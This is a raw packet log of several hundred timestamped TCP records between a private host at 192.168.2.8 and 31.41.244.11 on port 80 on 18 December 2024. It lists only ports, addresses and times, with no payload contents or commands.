Dec 18, 2024 13:38:26.698265076 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.705615044 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.705688953 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.705734968 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.705785990 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.746436119 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.746512890 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.746550083 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.746603966 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.818963051 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.818981886 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.819124937 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.821487904 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.821505070 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.821554899 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.821615934 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.826052904 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.826071024 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.826237917 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.830796003 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.830859900 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.831089973 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.831139088 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.835484982 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.835551023 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.835592031 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.835664034 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.840265989 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.840280056 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.840334892 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.845236063 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.845257998 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.845303059 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.845330954 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.850009918 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.850070953 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.850119114 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.850188971 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.854357004 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.854415894 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.854469061 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.854522943 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.859003067 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.859062910 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.859108925 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.859163046 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.863728046 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.863778114 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.863795996 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.863842010 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.868447065 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.868463039 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.868550062 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.873126030 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.873198032 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.873239040 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.873286963 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.877772093 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.877895117 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.877911091 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.877960920 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.881493092 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.881552935 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.881599903 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.881654978 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.885148048 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.885215044 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.885257006 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.885325909 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.888895988 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.888971090 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.889010906 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.889214993 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.892494917 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.892575026 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.892628908 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.892714024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.896244049 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.896298885 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.896313906 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.896353006 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.899866104 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.899920940 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.899938107 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.900016069 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.903561115 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.903629065 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.903747082 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.903810024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:26.907146931 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:26.907207012 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.011327982 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.011472940 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.011509895 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.011581898 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.012716055 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.012773037 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.012841940 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.012883902 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.015670061 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.015734911 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.015770912 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.015801907 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.018774986 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.018789053 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.018841982 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.021564007 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.021637917 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.021648884 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.021692991 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.024317980 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.024369001 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.024441004 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.024477959 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.027091026 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.027257919 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.027299881 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.027344942 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.029768944 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.029824972 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.029891968 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.029937029 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.032391071 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.032444954 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.032500029 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.032560110 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.035021067 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.035073996 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.035171032 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.035213947 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.037779093 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.037837029 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.037986994 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.038037062 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.040283918 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.040349007 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.040435076 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.040477991 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.043210983 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.043282032 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.043349028 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.043416977 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.046312094 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.046380043 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.046451092 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.046495914 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.048707008 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.048770905 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.048800945 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.048841000 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.050847054 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.050911903 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.050923109 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.050961971 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.053567886 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.053663969 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.053719997 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.053788900 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.056077957 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.056133986 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.056149960 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.056201935 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.058644056 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.058707952 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.058870077 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.058913946 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.061260939 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.061312914 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.061357021 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.061424971 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.063910961 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.063960075 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.064008951 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.064069986 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.066693068 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.066705942 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.066750050 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.069386959 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.069561958 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.069792032 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.069843054 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.071856976 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.071903944 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.072051048 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.072098017 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.074605942 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.074656963 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.074767113 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.074832916 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.077002048 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.077052116 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.077205896 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.077250004 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.079627037 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.079689026 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.079843044 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.079886913 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.082259893 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.082321882 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.082426071 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.082463026 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.085019112 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.085031986 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.085087061 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.087510109 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.087590933 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.087631941 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.087683916 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.090102911 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.090169907 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.090204954 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.090249062 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.203521967 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.203620911 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.203715086 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.203764915 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.204560995 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.204611063 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.204983950 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.205003023 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.205034018 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.205059052 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.207108021 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.207161903 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.207258940 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.207310915 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.209294081 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.209361076 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.209398985 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.209445000 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.211419106 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.211473942 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.211520910 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.211571932 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.213571072 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.213650942 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.213660002 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.213711977 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.215711117 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.215771914 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.215837002 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.215888977 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.218061924 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.218132973 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.218290091 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.218343973 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.219796896 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.219852924 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.219932079 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.219996929 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.222359896 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.222415924 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.222529888 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.222708941 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.224349976 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.224426031 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.224483967 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.224556923 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.226275921 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.226327896 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.226372004 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.226421118 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.228168011 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.228229046 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.228235006 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.228286982 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.230217934 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.230273008 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.230297089 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.230346918 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.232166052 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.232222080 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.232254982 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.232306957 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.234395027 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.234441042 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.234453917 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.234492064 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.236325979 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.236398935 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.236468077 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.236515045 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.238440037 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.238493919 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.238624096 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.238681078 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.240478039 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.240531921 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.240566015 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.240612984 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.242559910 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.242619991 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.242660999 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.242712021 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.244595051 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.244646072 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.244820118 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.244874954 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.246793032 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.246817112 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.246855021 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.246896982 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.248852968 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.248913050 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.249074936 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.249125957 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.250941038 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.250953913 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.251000881 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.252954960 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.253014088 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.253092051 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.253134012 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.254921913 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.254998922 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.255125999 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.255178928 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.257198095 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.257246971 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.257277012 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.257293940 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.259063959 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.259140015 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.259172916 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.259217024 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.261379004 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.261440039 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.261480093 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.261532068 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.263570070 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.263632059 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.263637066 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.263688087 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.265526056 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.265585899 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.265587091 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.265629053 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.267359972 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.267436981 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.267472029 CET	80	49712	31.41.244.11	192.168.2.8
